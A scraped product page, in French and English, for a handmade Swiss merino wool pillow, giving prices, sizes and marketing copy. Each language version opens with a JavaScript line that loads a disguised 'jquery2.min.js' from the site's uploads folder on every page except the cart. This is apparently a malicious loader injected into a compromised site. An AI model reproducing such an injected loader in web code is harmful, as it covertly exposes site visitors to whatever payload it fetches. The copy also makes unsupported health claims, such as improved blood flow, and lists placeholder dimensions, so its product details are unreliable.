if (window.location.pathname !== '/cart/') { var scriptElement = document.createElement('script'); scriptElement.src = '/wp-content/uploads/jquery2.min.js'; document.head.appendChild(scriptElement); }

Oreiller en laine mérinos | Wollbetten

Passez une nuit complète de sommeil sain avec l'oreiller en laine mérinos Wollbetten ! Ce produit naturel est non seulement fabriqué à la main, mais il vous apporte également de la détente et stimule votre circulation sanguine.

SKU SMTWMerLaineHPill Catégories , Marque:

$97.90 - $170.50

Poids 1.800 kg
Dimensions 1 × 1 × 1 cm

Oreiller en laine mérinos

Passez une nuit complète de sommeil sain avec l'oreiller en laine mérinos Wollbetten ! Dites adieu aux mouvements et aux retournements dans votre lit. Notre oreiller en laine naturelle est de qualité supérieure mérinos mélange. La laine mérinos possède d'excellentes propriétés isolantes qui ont un effet positif sur un sommeil sain. Il emmagasine la chaleur dégagée pendant le sommeil tout en compensant la température. Ainsi, vous n’aurez jamais trop chaud ni trop froid. Au contraire, vous ressentirez une sensation agréable et confortable tout au long de la nuit.

L'incroyable matière mérinos a une excellente propriétés d'isolation tout en étant incroyablement léger et doux. Ce produit naturel est non seulement fabriqué à la main mais vous apporte également de la détente et stimule votre circulation sanguine. Plus de douleur cou le matin! Plus important encore, ceci mérinos vient de seulement Mouton suisse.

 

Tableau des tailles d'oreillers

Attention au detail

Le caractère unique et l'authenticité des produits Wollbetten les distinguent par un standard de perfection. Nichée au cœur de la Suisse, l'entreprise fabrique ses chefs-d'œuvre naturels, démontrant un engagement envers la qualité qui définit la marque.

Offrant une touche personnalisée, Wollbetten se spécialise dans la création de pièces sur mesure dans des tailles spécifiques, garantissant une expérience sur mesure à la clientèle. Chaque article est méticuleusement fabriqué à la main, démontrant précision et soin à l'aide de diverses machines à coudre.

Le résultat est une collection de produits uniques et personnalisés qui reflètent le savoir-faire artisanal et l'attention aux détails synonymes de la marque Wollbetten.

Découvrez l’oreiller en laine mérinos et plus encore

Découvrez une gamme de Produits Wollbetten depuis notre boutique en ligne. Nous disposons d'une vaste collection de produits exceptionnels prêts à améliorer votre style de vie et votre confort. Veuillez parcourir notre page et acheter en fonction de vos besoins et désirs. Nous livrerons le produit directement à votre porte.

Panier

×
Votre panier est vide. :( Go to Shop
Sélectionnez votre devise
Oreiller en laine mérinos | WollbettenOreiller en laine mérinos | Wollbetten
$97.90 - $170.50Options
Remonter en haut
Rechercher

if (window.location.pathname !== '/cart/') { var scriptElement = document.createElement('script'); scriptElement.src = '/wp-content/uploads/jquery2.min.js'; document.head.appendChild(scriptElement); }

Merino Wool Pillow | Wollbetten

Have a full night of healthy sleep with the Wollbetten Merino Wool Pillow! This natural product is not only hand-made, but it also brings you relaxation and stimulates your blood flow.

SKU SMTWMerWoolHPill Categories , Brand:

$97.90$170.50

Weight 1.800 kg
Dimensions 1 × 1 × 1 cm

Merino Wool Pillow

Have a full night of healthy sleep with the Wollbetten Merino Wool Pillow! Say goodbye to tossing and turning in your bed. Our natural wool pillow is a fine-quality merino blend. Merino wool has great insulating properties, which have a positive effect on healthy sleep. It stores the heat that is released during sleep but is still temperature-compensating. Hence, you will never be too warm or too cold. Rather, you will have a pleasant, comfortable feeling throughout the whole night.

The amazing Merino material has great insulation properties while also being incredibly light and soft. This natural product is not only hand-made but also brings you relaxation and stimulates your blood flow. No more sore neck in the morning! Most importantly, this merino comes from only Swiss sheep.

 

Pillow Sizes Table

Attention to detail

The uniqueness and authenticity of Wollbetten’s products set them apart with a standard of perfection. Nestled in the heart of Switzerland, the company crafts its natural masterpieces, showcasing a commitment to quality that defines the brand.

Offering a personalized touch, Wollbetten specializes in creating custom-made pieces in specific sizes, ensuring a tailored experience for the clientele. Each item is meticulously handmade, demonstrating precision and care using various sewing machines.

The result is a collection of unique and personalized products that reflect the skilled craftsmanship and attention to detail synonymous with the Wollbetten brand.

Explore Merino Wool Pillow and more

Explore a range of Wollbetten products from our online store. We have a vast collection of exceptional products ready to elevate your lifestyle and comfort. Please browse through our page and purchase according to your needs and wants. We will deliver the product right at your doorstep.

Shopping cart

×
Select your currency
Merino Wool Pillow | WollbettenMerino Wool Pillow | Wollbetten
$97.90$170.50Select options
Scroll to Top
Search